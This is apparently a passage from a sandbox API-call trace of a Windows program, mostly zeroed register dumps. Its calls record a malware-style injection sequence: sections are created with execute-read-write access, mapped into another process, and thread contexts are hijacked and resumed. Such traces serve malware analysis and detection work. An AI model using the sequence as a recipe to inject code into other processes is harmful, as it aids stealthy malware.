[219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0161.429] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x13c) returned 0x0 [0161.429] NtMapViewOfSection (in: SectionHandle=0x13c, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x1ab200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x1ac000) returned 0x0 [0161.439] NtMapViewOfSection (in: SectionHandle=0x13c, ProcessHandle=0x134, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x1ab200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x1f60000, SectionOffset=0x0, ViewSize=0xde6e8*=0x1ac000) returned 0x0 [0161.491] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0161.518] NtClose (Handle=0x13c) returned 0x0 [0161.524] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1bff14, Ebx=0x216000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x1bfebc, Eip=0x2078707, SegCs=0x23, EFlags=0x202, Esp=0x1bfea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0161.538] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0161.539] NtClose (Handle=0x134) returned 0x0 [0161.539] NtClose (Handle=0x138) returned 0x0 [0161.542] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x234, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0161.542] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0161.542] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0161.542] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2cc000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0161.542] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0166.852] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x27c) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0166.880] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0166.881] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2420000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0167.016] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2cc000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0167.139] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0167.139] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xf7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xf8000) returned 0x0 [0167.152] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xf7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5c0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xf8000) 